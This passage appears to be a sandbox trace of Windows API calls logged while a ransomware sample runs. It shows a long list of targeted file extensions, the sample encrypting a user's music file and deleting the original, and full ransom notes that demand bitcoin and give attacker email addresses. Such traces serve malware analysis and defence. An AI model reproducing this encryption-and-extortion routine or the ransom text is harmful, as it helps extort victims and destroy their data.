.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".m4a") returned=".m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0194.209] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0194.210] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0194.210] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\sarxnz6avb1lkhe2u.m4a" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\sarxnz6avb1lkhe2u.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0194.214] ReadFile (in: hFile=0x388, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x166d4, lpNumberOfBytesRead=0x18a640, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18a640*=0x166d4, lpOverlapped=0x0) returned 1
	[0194.224] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0194.224] CryptAcquireContextW (in: phProv=0x18a1f0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a1f0*=0xfcac48) returned 1
	[0194.227] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0194.227] CryptCreateHash (in: hProv=0xfcac48, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18a1f4 | out: phHash=0x18a1f4) returned 1
	[0194.227] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0194.227] CryptHashData (hHash=0xfb8ef0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0194.227] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0194.227] CryptDeriveKey (in: hProv=0xfcac48, Algid=0x6610, hBaseData=0xfb8ef0, dwFlags=0x1, phKey=0x18a1f8 | out: phKey=0x18a1f8*=0xfb9030) returned 1
	[0194.228] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0194.228] CryptEncrypt (in: hKey=0xfb9030, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18a20c*=0x166d4, dwBufLen=0x166d4 | out: pbData=0x0*, pdwDataLen=0x18a20c*=0x166e0) returned 1
	[0194.332] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0194.332] RtlMoveMemory (in: Destination=0xff3860, Source=0xfdd180, Length=0x166d4 | out: Destination=0xff3860) 
	[0194.332] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0194.332] CryptEncrypt (in: hKey=0xfb9030, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xff3860*, pdwDataLen=0x18a1ec*=0x166d4, dwBufLen=0x166e0 | out: pbData=0xff3860*, pdwDataLen=0x18a1ec*=0x166e0) returned 1
	[0194.335] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0194.335] CryptDestroyKey (hKey=0xfb9030) returned 1
	[0194.335] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0194.335] CryptDestroyHash (hHash=0xfb8ef0) returned 1
	[0194.335] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0194.335] CryptReleaseContext (hProv=0xfcac48, dwFlags=0x0) returned 1
	[0194.335] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0194.336] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a208, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a208*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0194.336] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0194.336] GetUserNameA (in: lpBuffer=0x18a0ec, pcbBuffer=0x18a204 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a204) returned 1
	[0194.337] wsprintfW (in: param_1=0x18a220, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\sarxnz6avb1lkhe2u.m4a.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 127
	[0194.337] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\sarxnz6avb1lkhe2u.m4a.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\sarxnz6avb1lkhe2u.m4a.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0194.338] WriteFile (in: hFile=0x390, lpBuffer=0xff3860*, nNumberOfBytesToWrite=0x166e0, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0xff3860*, lpNumberOfBytesWritten=0x18a648*=0x166e0, lpOverlapped=0x0) returned 1
	[0194.346] CloseHandle (hObject=0x390) returned 1
	[0194.346] CloseHandle (hObject=0x388) returned 1
	[0194.346] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\sarxnz6avb1lkhe2u.m4a" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\sarxnz6avb1lkhe2u.m4a")) returned 1
	[0194.355] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\sarxnz6avb1lkhe2u.m4a" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\sarxnz6avb1lkhe2u.m4a")) returned 0
	[0194.356] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3deca70, ftCreationTime.dwHighDateTime=0x1d9726f, ftLastAccessTime.dwLowDateTime=0xcfd02cb0, ftLastAccessTime.dwHighDateTime=0x1d97343, ftLastWriteTime.dwLowDateTime=0xcfd02cb0, ftLastWriteTime.dwHighDateTime=0x1d97343, nFileSizeHigh=0x0, nFileSizeLow=0x166d4, dwReserved0=0x0, dwReserved1=0x0, cFileName="sArxNZ6aVb1lKhE2u.m4a", cAlternateFileName="SARXNZ~1.M4A")) returned 0
	[0194.356] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0194.356] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 0
	[0194.356] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl"
	[0194.356] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\*.*"
	[0194.357] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0194.357] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0194.357] wsprintfW (in: param_1=0x18a370, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\HELP_DECRYPT_YOUR_FILES.TXT") returned 91
	[0194.357] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0194.358] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0194.358] WriteFile (in: hFile=0x2c0, lpBuffer=0x189728*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18a64c, lpOverlapped=0x0 | out: lpBuffer=0x189728*, lpNumberOfBytesWritten=0x18a64c*=0xc46, lpOverlapped=0x0) returned 1
	[0194.360] CloseHandle (hObject=0x2c0) returned 1
	[0194.360] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1896f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1896f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0194.361] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0194.361] GetUserNameA (in: lpBuffer=0x1895dc, pcbBuffer=0x1896f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1896f4) returned 1
	[0194.362] wsprintfW (in: param_1=0x18a578, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0194.362] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0194.362] SetFilePointer (in: hFile=0x2c0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0194.363] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0194.363] WriteFile (in: hFile=0x2c0, lpBuffer=0x18a578*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18a654, lpOverlapped=0x0 | out: lpBuffer=0x18a578*, lpNumberOfBytesWritten=0x18a654*=0x30, lpOverlapped=0x0) returned 1
	[0194.363] CloseHandle (hObject=0x2c0) returned 1
	[0194.363] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0194.363] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0194.364] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0194.364] wsprintfW (in: param_1=0x18a330, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\HELP_DECRYPT_YOUR_FILES.HTML") returned 92
	[0194.364] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0194.364] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0194.364] WriteFile (in: hFile=0x2c0, lpBuffer=0x189b24*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0x189b24*, lpNumberOfBytesWritten=0x18a648*=0x808, lpOverlapped=0x0) returned 1
	[0194.367] CloseHandle (hObject=0x2c0) returned 1
	[0194.367] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
